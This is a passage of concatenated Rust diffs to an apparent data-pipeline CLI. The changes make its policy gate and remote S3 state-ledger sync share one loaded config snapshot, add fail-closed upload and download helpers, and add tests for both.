+        // (4) unloadable config ⇒ None (the seam's own fail-closed handling owns
+        //     the config error; there is no remote object to pull).
+        let missing = dir.path().join("does_not_exist.toml");
+        assert!(
+            super::remote_state_backend_for_gate(&missing, &touched).is_none(),
+            "unloadable config ⇒ no remote object to pull here"
+        );
+
+        Ok(())
     }
 
     #[test]

--- a/engine/crates/rocky-cli/src/commands/apply.rs
+++ b/engine/crates/rocky-cli/src/commands/apply.rs
@@ -229,12 +229,17 @@ async fn run_apply_run_plan(
     // v0). Enforcement uses the apply-time runtime principal, not the plan's
     // stored (tamperable) field. Absent `[policy]` this is a no-op.
     let models_dir = Path::new(run_plan.models_dir.as_deref().unwrap_or("models"));
+    // ONE config snapshot for the replication-only check, the pre-gate sync
+    // decision, AND the policy gate — so the guard and the gate can't disagree
+    // about `[policy]` presence if the on-disk file changes mid-apply (finding A).
+    let cfg = rocky_core::config::load_rocky_config(config_path).ok();
     // Gate on the models this apply will ACTUALLY execute (fresh compile +
     // `--model` selection), not the plan's informational `models` list. Finding
     // #1: a replication-only plan runs NO models, so it gates none (fail-safe: a
     // config that will not load is NOT treated as replication-only → strict).
-    let executable = if rocky_core::config::load_rocky_config(config_path)
-        .map(|cfg| is_replication_only(&cfg, &run_plan))
+    let executable = if cfg
+        .as_ref()
+        .map(|cfg| is_replication_only(cfg, &run_plan))
         .unwrap_or(false)
     {
         Vec::new()
@@ -246,9 +251,11 @@ async fn run_apply_run_plan(
     // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
     // the gate reads it, so a cross-pod freeze is enforced (fail-closed). Skipped
     // when the gate won't read the ledger (no policy / empty touched — finding 8).
-    sync_remote_ledger_before_gate(config_path, state_path, &touched).await?;
-    let gate = evaluate_apply_policy(
-        config_path,
+    if let Some(cfg) = &cfg {
+        sync_remote_ledger_before_gate(cfg, state_path, &touched).await?;
+    }
+    let gate = evaluate_apply_policy_with_policy(
+        cfg.as_ref().and_then(|c| c.policy.as_ref()),
         plan_id,
         principal,
         &touched,
@@ -752,22 +759,19 @@ fn model_attributes(models_dir: &Path) -> BTreeMap<String, ModelAttributes> {
 /// regression for a valid human Run/Promote plan on a backend blip (finding 8) —
 /// so this returns `None` and the caller skips the download entirely.
 ///
-/// `None` is also returned when the config cannot be loaded — a genuine config
-/// error is surfaced by the seam's own fail-closed handling
-/// ([`bail_on_config_load_error`] on the gc/backfill paths, or the run path's
-/// re-load), so there is no remote object to pull in that case.
+/// Takes an ALREADY-LOADED config snapshot (finding A: the guard and the gate
+/// must see the SAME config, so the caller loads once and threads it into both).
 fn remote_state_backend_for_gate(
-    config_path: &Path,
+    cfg: &rocky_core::config::RockyConfig,
     touched: &BTreeMap<String, PolicyCapability>,
 ) -> Option<rocky_core::config::StateConfig> {
     // Empty touched set ⇒ the gate is a no-op Allow, no ledger read.
     if touched.is_empty() {
         return None;
     }
-    let cfg = rocky_core::config::load_rocky_config(config_path).ok()?;
     // No `[policy]` block ⇒ the gate returns NotConfigured, no ledger read.
     cfg.policy.as_ref()?;
-    let state_cfg = cfg.state;
+    let state_cfg = cfg.state.clone();
     (!matches!(state_cfg.backend, StateBackend::Local)).then_some(state_cfg)
 }
 
@@ -782,14 +786,17 @@ fn remote_state_backend_for_gate(
 /// actually read the ledger (see [`remote_state_backend_for_gate`] — finding 8).
 /// Fail-closed: when the sync IS warranted, a remote download failure aborts.
 ///
-/// `pub(crate)` so the `restore` seam reuses the exact same guarded, fail-closed
-/// pre-gate sync (finding 1).
+/// Takes the SAME `cfg` snapshot the caller passes to
+/// [`evaluate_apply_policy_with_policy`], so the sync decision and the gate can
+/// never disagree about `[policy]` presence (finding A). `pub(crate)` so the
+/// `restore` seam reuses the exact same guarded, fail-closed pre-gate sync
+/// (finding 1).
 pub(crate) async fn sync_remote_ledger_before_gate(
-    config_path: &Path,
+    cfg: &rocky_core::config::RockyConfig,
     state_path: &Path,
     touched: &BTreeMap<String, PolicyCapability>,
 ) -> Result<()> {
-    let Some(state_cfg) = remote_state_backend_for_gate(config_path, touched) else {
+    let Some(state_cfg) = remote_state_backend_for_gate(cfg, touched) else {
         return Ok(());
     };
     rocky_core::state_sync::download_state(&state_cfg, state_path)
@@ -808,12 +815,13 @@ pub(crate) async fn sync_remote_ledger_before_gate(
 /// download on a dedicated runtime inside the shared gate closes BOTH entry
 /// points without threading an async download through each caller. Same
 /// finding-8 guard: skips the download unless the gate will read the ledger.
+/// Takes the same `cfg` snapshot used for the gate (finding A).
 fn sync_remote_ledger_before_gate_blocking(
-    config_path: &Path,
+    cfg: &rocky_core::config::RockyConfig,
     state_path: &Path,
     touched: &BTreeMap<String, PolicyCapability>,
 ) -> Result<()> {
-    let Some(state_cfg) = remote_state_backend_for_gate(config_path, touched) else {
+    let Some(state_cfg) = remote_state_backend_for_gate(cfg, touched) else {
         return Ok(());
     };
     crate::commands::policy::block_on_state_sync(rocky_core::state_sync::download_state(
@@ -855,7 +863,42 @@ pub fn evaluate_apply_policy(
     models_dir: &Path,
     state_path: &Path,
 ) -> PolicyGate {
-    let (policy, attrs_map) = match load_policy_and_attrs(config_path, touched, models_dir) {
+    // Load the config here for callers that don't already hold a snapshot (gc,
+    // the MCP propose gate, tests). Governed apply/restore/promote paths call
+    // [`evaluate_apply_policy_with_policy`] with the SAME snapshot they used for
+    // the pre-gate sync decision, so the sync-guard and this gate can never
+    // disagree about whether `[policy]` is configured (finding A — config-snapshot
+    // TOCTOU).
+    let policy = rocky_core::config::load_rocky_config(config_path)
+        .ok()
+        .and_then(|cfg| cfg.policy);
+    evaluate_apply_policy_with_policy(
+        policy.as_ref(),
+        plan_id,
+        principal,
+        touched,
+        models_dir,
+        state_path,
+    )
+}
+
+/// [`evaluate_apply_policy`] over an ALREADY-RESOLVED `[policy]` block, rather
+/// than reloading the config from disk.
+///
+/// The governed paths (run-apply, ai-authored, backfill, promote, restore) load
+/// ONE immutable config snapshot and thread its `policy` into both the pre-gate
+/// remote-state sync decision AND this evaluation, so a config that gains a
+/// `[policy]` block between the two can't make the guard skip the sync while this
+/// gate then reads stale local decisions (finding A).
+pub(crate) fn evaluate_apply_policy_with_policy(
+    policy: Option<&rocky_core::config::PolicyConfig>,
+    plan_id: &str,
+    principal: PolicyPrincipal,
+    touched: &BTreeMap<String, PolicyCapability>,
+    models_dir: &Path,
+    state_path: &Path,
+) -> PolicyGate {
+    let (policy, attrs_map) = match resolve_policy_and_attrs(policy, touched, models_dir) {
         Ok(pair) => pair,
         Err(gate) => return gate,
     };
@@ -957,9 +1000,11 @@ pub(crate) fn evaluate_apply_policy_with_store(
     )
 }
 
-/// Load the `[policy]` block and compile the per-model attributes, or return an
-/// early [`PolicyGate`] — `NotConfigured` when there is no loadable `[policy]`
-/// block, `Allow` when `touched` is empty (a genuine no-op executes nothing).
+/// Load the `[policy]` block from `config_path` and compile the per-model
+/// attributes, or return an early [`PolicyGate`]. A thin wrapper over
+/// [`resolve_policy_and_attrs`] for callers that reach the gate through a
+/// config path rather than a held config snapshot (e.g.
+/// [`evaluate_apply_policy_with_store`]).
 fn load_policy_and_attrs(
     config_path: &Path,
     touched: &BTreeMap<String, PolicyCapability>,
@@ -971,15 +1016,31 @@ fn load_policy_and_attrs(
     ),
     PolicyGate,
 > {
-    let policy = match rocky_core::config::load_rocky_config(config_path) {
-        Ok(cfg) => match cfg.policy {
-            Some(p) => p,
-            None => return Err(PolicyGate::NotConfigured),
-        },
-        // A missing or malformed config leaves the policy plane unconfigured —
-        // the caller keeps its pre-policy-plane gate. (The run path re-loads and
-        // surfaces any real config error itself.)
-        Err(_) => return Err(PolicyGate::NotConfigured),
+    // A missing or malformed config leaves the policy plane unconfigured — the
+    // caller keeps its pre-policy-plane gate. (The run path re-loads and surfaces
+    // any real config error itself.)
+    let policy = rocky_core::config::load_rocky_config(config_path)
+        .ok()
+        .and_then(|cfg| cfg.policy);
+    resolve_policy_and_attrs(policy.as_ref(), touched, models_dir)
+}
+
+/// Given an ALREADY-RESOLVED `[policy]` block, compile the per-model attributes,
+/// or return an early [`PolicyGate`] — `NotConfigured` when there is no policy,
+/// `Allow` when `touched` is empty (a genuine no-op executes nothing).
+fn resolve_policy_and_attrs(
+    policy: Option<&rocky_core::config::PolicyConfig>,
+    touched: &BTreeMap<String, PolicyCapability>,
+    models_dir: &Path,
+) -> std::result::Result<
+    (
+        rocky_core::config::PolicyConfig,
+        BTreeMap<String, ModelAttributes>,
+    ),
+    PolicyGate,
+> {
+    let Some(policy) = policy else {
+        return Err(PolicyGate::NotConfigured);
     };
     // An empty touched set means the plan executes no models (a genuine no-op).
     // A no-change-but-executing plan is never empty here — see the touched-set
@@ -987,7 +1048,7 @@ fn load_policy_and_attrs(
     if touched.is_empty() {
         return Err(PolicyGate::Allow);
     }
-    Ok((policy, model_attributes(models_dir)))
+    Ok((policy.clone(), model_attributes(models_dir)))
 }
 
 /// The per-model evaluation loop shared by [`evaluate_apply_policy`] and
@@ -1766,6 +1827,9 @@ pub(crate) fn gate_promote_plan(
     promote_plan: &PromotePlan,
     state_path: &Path,
 ) -> Result<()> {
+    // ONE config snapshot for the pre-gate sync decision AND the policy gate
+    // (finding A — config-snapshot TOCTOU).
+    let cfg = rocky_core::config::load_rocky_config(config_path).ok();
     let promote_models_dir = resolve_config_models_dir(config_path);
     let touched = touched_models_for_promote(promote_plan, &promote_models_dir);
     // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
@@ -1773,9 +1837,11 @@ pub(crate) fn gate_promote_plan(
     // shared gate so BOTH promote entry points (`rocky apply <promote>` and
     // `rocky branch promote --plan`) are covered. Fail-closed, but skipped when
     // the gate won't read the ledger (no policy / empty touched — finding 8).
-    sync_remote_ledger_before_gate_blocking(config_path, state_path, &touched)?;
-    let gate = evaluate_apply_policy(
-        config_path,
+    if let Some(cfg) = &cfg {
+        sync_remote_ledger_before_gate_blocking(cfg, state_path, &touched)?;
+    }
+    let gate = evaluate_apply_policy_with_policy(
+        cfg.as_ref().and_then(|c| c.policy.as_ref()),
         plan_id,
         principal,
         &touched,
@@ -2099,12 +2165,16 @@ async fn run_apply_ai_authored_plan(
     // AiAuthored gate. Absent a `[policy]` block the evaluator is never
     // constructed and the pre-policy-plane marker gate remains — byte-identical to today.
     let models_dir = Path::new(run_plan.models_dir.as_deref().unwrap_or("models"));
+    // ONE config snapshot for the replication-only check, the pre-gate sync
+    // decision, AND the policy gate (finding A — config-snapshot TOCTOU).
+    let cfg = rocky_core::config::load_rocky_config(config_path).ok();
     // Gate on the models this apply will ACTUALLY execute (fresh compile +
     // `--model` selection), not the plan's informational `models` list. Finding
     // #1: a replication-only plan runs NO models, so it gates none (fail-safe: a
     // config that will not load is NOT treated as replication-only → strict).
-    let executable = if rocky_core::config::load_rocky_config(config_path)
-        .map(|cfg| is_replication_only(&cfg, &run_plan))
+    let executable = if cfg
+        .as_ref()
+        .map(|cfg| is_replication_only(cfg, &run_plan))
         .unwrap_or(false)
     {
         Vec::new()
@@ -2116,9 +2186,11 @@ async fn run_apply_ai_authored_plan(
     // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
     // the gate reads it, so a cross-pod freeze is enforced (fail-closed). Skipped
     // when the gate won't read the ledger (no policy / empty touched — finding 8).
-    sync_remote_ledger_before_gate(config_path, state_path, &touched).await?;
-    let gate = evaluate_apply_policy(
-        config_path,
+    if let Some(cfg) = &cfg {
+        sync_remote_ledger_before_gate(cfg, state_path, &touched).await?;
+    }
+    let gate = evaluate_apply_policy_with_policy(
+        cfg.as_ref().and_then(|c| c.policy.as_ref()),
         plan_id,
         principal,
         &touched,
@@ -2224,10 +2296,13 @@ async fn run_apply_backfill_plan(
 
     // Policy can only tighten the gate: a `deny` hard-refuses even a reviewed
     // backfill. The marker above already satisfies any policy `require_review`.
-    // Fail-closed pre-check: the backfill execution path does not itself need
-    // the config to have loaded, so a config-load ERROR must bail here rather
-    // than silently unenforcing a possibly-configured `[policy]` block.
+    // Fail-closed pre-check: the backfill execution path does not itself need the
+    // config to have loaded, so a config-load ERROR must bail here rather than
+    // silently unenforcing a possibly-configured `[policy]` block.
     bail_on_config_load_error(config_path, "backfill", plan_id)?;
+    // ONE config snapshot for the pre-gate sync decision AND the policy gate, so
+    // the guard and gate can't disagree about `[policy]` presence (finding A).
+    let cfg = rocky_core::config::load_rocky_config(config_path).ok();
     let models_dir = Path::new(run_plan.models_dir.as_deref().unwrap_or("models"));
     // A backfill's `models` list IS the authoritative rebuild closure the
     // engine composed and will execute (see `execute_backfill_set` below), not
@@ -2236,9 +2311,11 @@ async fn run_apply_backfill_plan(
     // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
     // the gate reads it, so a cross-pod freeze is enforced (fail-closed). Skipped
     // when the gate won't read the ledger (no policy / empty touched — finding 8).
-    sync_remote_ledger_before_gate(config_path, state_path, &touched).await?;
-    let gate = evaluate_apply_policy(
-        config_path,
+    if let Some(cfg) = &cfg {
+        sync_remote_ledger_before_gate(cfg, state_path, &touched).await?;
+    }
+    let gate = evaluate_apply_policy_with_policy(
+        cfg.as_ref().and_then(|c| c.policy.as_ref()),
         plan_id,
         plan.enforcement_principal(runtime_principal),
         &touched,
@@ -3266,8 +3343,9 @@ default_agent_effect = "require_review"
     /// Finding 8: the pre-gate remote sync must run ONLY when the gate will
     /// actually read the freeze/budget ledger — otherwise a backend blip would
     /// falsely abort a valid human Run/Promote plan. `remote_state_backend_for_gate`
-    /// returns `Some` (sync warranted) only for {non-empty touched} ∧ {policy
-    /// configured} ∧ {remote backend}; `None` (skip the download) otherwise.
+    /// (now over a single loaded config snapshot — finding A) returns `Some`
+    /// (sync warranted) only for {non-empty touched} ∧ {policy configured} ∧
+    /// {remote backend}; `None` (skip the download) otherwise.
     #[test]
     fn remote_state_backend_for_gate_only_syncs_when_ledger_is_read() -> anyhow::Result<()> {
         use std::collections::BTreeMap;
@@ -3278,10 +3356,17 @@ default_agent_effect = "require_review"
         let empty: BTreeMap<String, PolicyCapability> = BTreeMap::new();
 
         let state_s3 = "\n[state]\nbackend = \"s3\"\ns3_bucket = \"b\"\n";
+        let load = |name: &str, body: String| -> anyhow::Result<rocky_core::config::RockyConfig> {
+            let path = dir.path().join(name);
+            std::fs::write(&path, body)?;
+            Ok(rocky_core::config::load_rocky_config(&path)?)
+        };
 
         // (1) policy + remote + non-empty touched ⇒ Some (sync warranted).
-        let remote_policy = dir.path().join("remote_policy.toml");
-        std::fs::write(&remote_policy, format!("{EMPTY_POLICY_TOML}{state_s3}"))?;
+        let remote_policy = load(
+            "remote_policy.toml",
+            format!("{EMPTY_POLICY_TOML}{state_s3}"),
+        )?;
         assert!(
             super::remote_state_backend_for_gate(&remote_policy, &touched).is_some(),
             "policy + remote backend + non-empty touched ⇒ pre-gate sync warranted"
@@ -3294,29 +3379,86 @@ default_agent_effect = "require_review"
         );
 
         // (2) remote backend but NO [policy] ⇒ None (gate returns NotConfigured).
-        let remote_nopolicy = dir.path().join("remote_nopolicy.toml");
-        std::fs::write(&remote_nopolicy, format!("{NO_POLICY_TOML}{state_s3}"))?;
+        let remote_nopolicy = load(
+            "remote_nopolicy.toml",
+            format!("{NO_POLICY_TOML}{state_s3}"),
+        )?;
         assert!(
             super::remote_state_backend_for_gate(&remote_nopolicy, &touched).is_none(),
             "no [policy] block ⇒ gate returns NotConfigured, reads no ledger ⇒ no sync (finding 8)"
         );
 
         // (3) policy but LOCAL backend (no [state]) ⇒ None (nothing to pull).
-        let local_policy = dir.path().join("local_policy.toml");
-        std::fs::write(&local_policy, EMPTY_POLICY_TOML)?;
+        let local_policy = load("local_policy.toml", EMPTY_POLICY_TOML.to_string())?;
         assert!(
             super::remote_state_backend_for_gate(&local_policy, &touched).is_none(),
             "local backend ⇒ nothing to download"
         );
 
-        // (4) unloadable config ⇒ None (the seam's own fail-closed handling owns
-        //     the config error; there is no remote object to pull).
-        let missing = dir.path().join("does_not_exist.toml");
+        // (An unloadable config never reaches the guard: the governed paths load
+        // the snapshot with `.ok()` and skip the guard when it is `None`.)
+        Ok(())
+    }
+
+    /// Finding A: `evaluate_apply_policy_with_policy` evaluates the PASSED policy
+    /// snapshot and never reloads the config from disk — so a governed path can
+    /// use the SAME snapshot for the pre-gate sync decision and the gate, closing
+    /// the config-snapshot TOCTOU. Proven by evaluating with a policy that has a
+    /// deny rule (⇒ Deny) vs `None` (⇒ NotConfigured), with no config file at the
+    /// gate's reach.
+    #[test]
+    fn evaluate_apply_policy_with_policy_uses_passed_snapshot_not_reload() -> anyhow::Result<()> {
+        let dir = tempfile::tempdir()?;
+        let config = write_config(
+            dir.path(),
+            r#"
+[[policy.rules]]
+principal = "agent"
+capability = "apply"
+scope = { any = true }
+effect = "deny"
+"#,
+        )?;
+        let policy = rocky_core::config::load_rocky_config(&config)?.policy;
         assert!(
-            super::remote_state_backend_for_gate(&missing, &touched).is_none(),
-            "unloadable config ⇒ no remote object to pull here"
+            policy.is_some(),
+            "the fixture config must carry a [policy] block"
         );
 
+        let mut touched = BTreeMap::new();
+        touched.insert("m".to_string(), PolicyCapability::Apply);
+        // Point the gate at a DIFFERENT directory that has no config file, so a
+        // reload would find nothing — only the passed policy can produce a Deny.
+        let elsewhere = tempfile::tempdir()?;
+        let models_dir = elsewhere.path().join("models");
+        let state = elsewhere.path().join("state.redb");
+
+        let gate = super::evaluate_apply_policy_with_policy(
+            policy.as_ref(),
+            "plan_a",
+            PolicyPrincipal::Agent,
+            &touched,
+            &models_dir,
+            &state,
+        );
+        assert!(
+            matches!(gate, PolicyGate::Deny { .. }),
+            "the PASSED policy (deny rule) must produce Deny even with no config file at the \
+             gate's location; got {gate:?}"
+        );
+
+        let gate_none = super::evaluate_apply_policy_with_policy(
+            None,
+            "plan_a",
+            PolicyPrincipal::Agent,
+            &touched,
+            &models_dir,
+            &state,
+        );
+        assert!(
+            matches!(gate_none, PolicyGate::NotConfigured),
+            "no policy passed ⇒ NotConfigured (no disk reload); got {gate_none:?}"
+        );
         Ok(())
     }
 

--- a/engine/crates/rocky-cli/src/commands/apply.rs
+++ b/engine/crates/rocky-cli/src/commands/apply.rs
@@ -37,7 +37,10 @@ use std::collections::{BTreeMap, BTreeSet};
 use std::path::Path;
 
 use anyhow::{Context, Result, bail};
-use rocky_core::config::{PolicyCapability, PolicyEffect, PolicyPrincipal, StateBackend};
+use rocky_core::config::{
+    PolicyCapability, PolicyEffect, PolicyPrincipal, StateBackend, StateConfig,
+    StateUploadFailureMode,
+};
 use rocky_core::policy::{self, ModelAttributes};
 use rocky_core::schema::SchemaPattern;
 use rocky_core::state::{PolicyDecisionRecord, StateStore};
@@ -268,6 +271,17 @@ async fn run_apply_run_plan(
     // into execution (the run plan owns the models_dir the resolver reads).
     let verify_checks = required_verify_after(config_path, principal, &touched, models_dir);
 
+    // Finding 3 (pre-run half): the plain rule decision the gate just recorded
+    // must survive `run`'s start-download, which REPLACES the local ledger from
+    // remote. Push it to remote NOW so `run`'s download pulls it back — otherwise
+    // the budget-burn PAIR (rule decision + verify-after custody) never both reach
+    // remote and a failed apply doesn't burn the budget. Only when a verify-after
+    // requirement exists (the budget-relevant case).
+    if !verify_checks.is_empty() {
+        upload_remote_ledger_fail_closed(cfg.as_ref(), state_path, "governed rule decision")
+            .await?;
+    }
+
     // One unique id for this apply's run, threaded into execution and into the
     // post-apply gate so the gate reads exactly this run, not "latest".
     let apply_run_id = new_apply_run_id();
@@ -293,13 +307,21 @@ async fn run_apply_run_plan(
         governed.as_ref(),
     )
     .await?;
-    run_verify_after(
+    let verify_result = run_verify_after(
         plan_id,
         principal,
         &verify_checks,
         &apply_run_id,
         state_path,
-    )
+    );
+    // Finding 3 (post-verify half): the verify-after custody row `run_verify_after`
+    // just wrote lands AFTER `run`'s end-upload, so push it to remote (fail-closed)
+    // even when verification FAILED — the failure-custody row is the budget-burning
+    // half of the pair. Upload before propagating the verify result.
+    if !verify_checks.is_empty() {
+        upload_remote_ledger_fail_closed(cfg.as_ref(), state_path, "verify-after custody").await?;
+    }
+    verify_result
 }
 
 /// Build the [`GovernedRunContext`] for a two-step apply — `Some` only for an
@@ -832,6 +854,66 @@ fn sync_remote_ledger_before_gate_blocking(
          governed promote requires the state backend reachable so a cross-pod freeze/budget \
          decision is enforced"
     })?;
+    Ok(())
+}
+
+/// Download the remote `[state]` ledger UNCONDITIONALLY for a remote backend
+/// (fail-closed), regardless of `[policy]` presence.
+///
+/// Used by seams that read a REPLICATED ledger the policy guard does not cover —
+/// `restore` reads `TOMBSTONES`, `backfill` writes on top of the artifact/run
+/// ledger (finding 2). Gating the download behind the policy guard would make a
+/// no-`[policy]` restore read STALE local tombstones and falsely refuse. No-op
+/// for the Local backend or an unloadable config.
+pub(crate) async fn download_remote_ledger_unconditional(
+    cfg: Option<&rocky_core::config::RockyConfig>,
+    state_path: &Path,
+    context_label: &str,
+) -> Result<()> {
+    let Some(cfg) = cfg else {
+        return Ok(());
+    };
+    if matches!(cfg.state.backend, StateBackend::Local) {
+        return Ok(());
+    }
+    rocky_core::state_sync::download_state(&cfg.state, state_path)
+        .await
+        .with_context(|| {
+            format!(
+                "failed to download remote state before {context_label}; a remote-backend \
+                 {context_label} requires the state backend reachable to read the authoritative \
+                 ledger"
+            )
+        })?;
+    Ok(())
+}
+
+/// Upload the local `[state]` ledger to a REMOTE backend, FAIL-CLOSED
+/// (`on_upload_failure = Fail`), so a governed ledger mutation is durable.
+///
+/// Used for the restore/backfill upload-after (finding 2) and to make the
+/// budget-burn decision pair (rule decision + verify-after custody) reach remote
+/// (finding 3). No-op for the Local backend or an unloadable config.
+pub(crate) async fn upload_remote_ledger_fail_closed(
+    cfg: Option<&rocky_core::config::RockyConfig>,
+    state_path: &Path,
+    context_label: &str,
+) -> Result<()> {
+    let Some(cfg) = cfg else {
+        return Ok(());
+    };
+    if matches!(cfg.state.backend, StateBackend::Local) {
+        return Ok(());
+    }
+    let upload_cfg = StateConfig {
+        on_upload_failure: StateUploadFailureMode::Fail,
+        ..cfg.state.clone()
+    };
+    rocky_core::state_sync::upload_state(&upload_cfg, state_path)
+        .await
+        .with_context(|| {
+            format!("failed to upload remote state after {context_label} (fail-closed)")
+        })?;
     Ok(())
 }
 
@@ -2214,6 +2296,14 @@ async fn run_apply_ai_authored_plan(
     // Resolve the post-apply verification checks before the run plan is moved.
     let verify_checks = required_verify_after(config_path, principal, &touched, models_dir);
 
+    // Finding 3 (pre-run half): make the plain rule decision durable on remote
+    // before `run`'s start-download replaces the local ledger — see the twin in
+    // `run_apply_run_plan`.
+    if !verify_checks.is_empty() {
+        upload_remote_ledger_fail_closed(cfg.as_ref(), state_path, "governed rule decision")
+            .await?;
+    }
+
     // One unique id for this apply's run, threaded into execution and into the
     // post-apply gate so the gate reads exactly this run, not "latest".
     let apply_run_id = new_apply_run_id();
@@ -2235,13 +2325,19 @@ async fn run_apply_ai_authored_plan(
         governed.as_ref(),
     )
     .await?;
-    run_verify_after(
+    let verify_result = run_verify_after(
         plan_id,
         principal,
         &verify_checks,
         &apply_run_id,
         state_path,
-    )
+    );
+    // Finding 3 (post-verify half): push the verify-after custody row to remote
+    // (fail-closed) even on failure — see the twin in `run_apply_run_plan`.
+    if !verify_checks.is_empty() {
+        upload_remote_ledger_fail_closed(cfg.as_ref(), state_path, "verify-after custody").await?;
+    }
+    verify_result
 }
 
 /// Apply a `PlanKind::Backfill` plan — a scoped, review-gated recovery run.
@@ -2308,12 +2404,12 @@ async fn run_apply_backfill_plan(
     // engine composed and will execute (see `execute_backfill_set` below), not
     // an informational hint — gate on it directly.
     let touched = touched_models_for_run(&plan, &run_plan.models);
-    // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
-    // the gate reads it, so a cross-pod freeze is enforced (fail-closed). Skipped
-    // when the gate won't read the ledger (no policy / empty touched — finding 8).
-    if let Some(cfg) = &cfg {
-        sync_remote_ledger_before_gate(cfg, state_path, &touched).await?;
-    }
+    // Finding 2c (download-before): a backfill writes on top of the artifact/run/
+    // provenance ledger, so pull the authoritative remote state UNCONDITIONALLY
+    // for a remote backend (fail-closed) — not gated on policy — so it neither
+    // reads stale local state nor clobbers newer remote state on the upload-after.
+    // This also refreshes the freeze ledger the gate reads.
+    download_remote_ledger_unconditional(cfg.as_ref(), state_path, "backfill apply").await?;
     let gate = evaluate_apply_policy_with_policy(
         cfg.as_ref().and_then(|c| c.policy.as_ref()),
         plan_id,
@@ -2430,7 +2526,13 @@ async fn run_apply_backfill_plan(
         output_json,
     )
     .await
-    .with_context(|| format!("rocky apply backfill plan '{plan_id}' failed"))
+    .with_context(|| format!("rocky apply backfill plan '{plan_id}' failed"))?;
+
+    // Finding 2c (upload-after): the backfill wrote artifact/run/provenance rows
+    // to local state; push them to the remote backend (fail-closed) so the next
+    // run's start-download does not silently revert the recovery. Runs only after
+    // a successful backfill.
+    upload_remote_ledger_fail_closed(Some(&rocky_cfg), state_path, "backfill apply").await
 }
 
 /// Apply a `PlanKind::Replication` plan by re-running discovery, asserting
@@ -3397,6 +3499,60 @@ default_agent_effect = "require_review"
 
         // (An unloadable config never reaches the guard: the governed paths load
         // the snapshot with `.ok()` and skip the guard when it is `None`.)
+        Ok(())
+    }
+
+    /// Findings 2 & 3: the ledger-seam helpers used by restore/backfill
+    /// (upload-after / unconditional download) and the verify-after budget-pair
+    /// uploads are REMOTE-ONLY (a Local backend / absent config is a no-op) and
+    /// FAIL-CLOSED (a remote transfer failure propagates as `Err`).
+    #[tokio::test]
+    async fn ledger_seam_helpers_are_remote_only_and_fail_closed() -> anyhow::Result<()> {
+        let dir = tempfile::tempdir()?;
+        let state = dir.path().join("state.redb");
+        let load = |name: &str, body: String| -> anyhow::Result<rocky_core::config::RockyConfig> {
+            let path = dir.path().join(name);
+            std::fs::write(&path, body)?;
+            Ok(rocky_core::config::load_rocky_config(&path)?)
+        };
+
+        // Local backend (no [state]) + absent config ⇒ both helpers no-op Ok.
+        let local_cfg = load("local.toml", NO_POLICY_TOML.to_string())?;
+        assert!(matches!(local_cfg.state.backend, StateBackend::Local));
+        for cfg in [Some(&local_cfg), None] {
+            super::download_remote_ledger_unconditional(cfg, &state, "test")
+                .await
+                .expect("Local/absent ⇒ download is a no-op");
+            super::upload_remote_ledger_fail_closed(cfg, &state, "test")
+                .await
+                .expect("Local/absent ⇒ upload is a no-op");
+        }
+
+        // Remote backend (S3, no bucket) ⇒ both helpers ATTEMPT the transfer
+        // unconditionally and FAIL CLOSED (the misconfigured S3 dispatch errors).
+        let remote_cfg = load(
+            "remote.toml",
+            format!("{NO_POLICY_TOML}\n[state]\nbackend = \"s3\"\n"),
+        )?;
+        assert!(matches!(remote_cfg.state.backend, StateBackend::S3));
+        assert!(
+            super::download_remote_ledger_unconditional(Some(&remote_cfg), &state, "test")
+                .await
+                .is_err(),
+            "the unconditional download must attempt (and fail closed) on a remote backend"
+        );
+        // The upload helper needs a local file to exist (else upload_state
+        // early-returns Ok before the backend is touched).
+        {
+            let s = StateStore::open(&state)?;
+            drop(s);
+        }
+        assert!(
+            super::upload_remote_ledger_fail_closed(Some(&remote_cfg), &state, "test")
+                .await
+                .is_err(),
+            "the fail-closed upload must propagate a remote failure (on_upload_failure = Fail)"
+        );
         Ok(())
     }
 

--- a/engine/crates/rocky-cli/src/commands/apply.rs
+++ b/engine/crates/rocky-cli/src/commands/apply.rs
@@ -37,7 +37,7 @@ use std::collections::{BTreeMap, BTreeSet};
 use std::path::Path;
 
 use anyhow::{Context, Result, bail};
-use rocky_core::config::{PolicyCapability, PolicyEffect, PolicyPrincipal};
+use rocky_core::config::{PolicyCapability, PolicyEffect, PolicyPrincipal, StateBackend};
 use rocky_core::policy::{self, ModelAttributes};
 use rocky_core::schema::SchemaPattern;
 use rocky_core::state::{PolicyDecisionRecord, StateStore};
@@ -243,6 +243,9 @@ async fn run_apply_run_plan(
     };
     let touched = touched_models_for_run(&plan, &executable);
     let principal = plan.enforcement_principal(runtime_principal);
+    // Finding 4-apply: pull the authoritative remote freeze/budget ledger before
+    // the gate reads it, so a cross-pod freeze is enforced (fail-closed).
+    sync_remote_ledger_before_gate(config_path, state_path).await?;
     let gate = evaluate_apply_policy(
         config_path,
         plan_id,
@@ -732,6 +735,64 @@ fn model_attributes(models_dir: &Path) -> BTreeMap<String, ModelAttributes> {
         );
     }
     out
+}
+
+/// Resolve the `[state]` backend for a governed apply seam, returning the config
+/// ONLY when the backend is a REMOTE one whose authoritative ledger must be
+/// pulled before the freeze/budget gate reads the LOCAL state file.
+///
+/// `None` for the Local backend, or when the config cannot be loaded — a genuine
+/// config error is surfaced by the seam's own fail-closed handling
+/// ([`bail_on_config_load_error`] on the gc/backfill paths, or the run path's
+/// re-load), so there is no remote object to pull in that case.
+fn remote_state_backend_for_gate(config_path: &Path) -> Option<rocky_core::config::StateConfig> {
+    let state_cfg = rocky_core::config::load_rocky_config(config_path)
+        .map(|cfg| cfg.state)
+        .ok()?;
+    (!matches!(state_cfg.backend, StateBackend::Local)).then_some(state_cfg)
+}
+
+/// Download the authoritative remote `[state]` ledger before a governed policy
+/// gate reads it (async caller sites).
+///
+/// The freeze/budget decisions [`evaluate_apply_policy`] consults live in the
+/// `policy_decisions` ledger that `rocky run` downloads at start and uploads at
+/// end. A governed apply gates BEFORE any such run-download, so without this a
+/// freeze recorded by another pod would be invisible and the gate would clear
+/// against a stale local snapshot (finding 4-apply). No-op for the Local
+/// backend. Fail-closed: a remote download failure aborts the apply.
+async fn sync_remote_ledger_before_gate(config_path: &Path, state_path: &Path) -> Result<()> {
+    let Some(state_cfg) = remote_state_backend_for_gate(config_path) else {
+        return Ok(());
+    };
+    rocky_core::state_sync::download_state(&state_cfg, state_path)
+        .await
+        .with_context(|| {
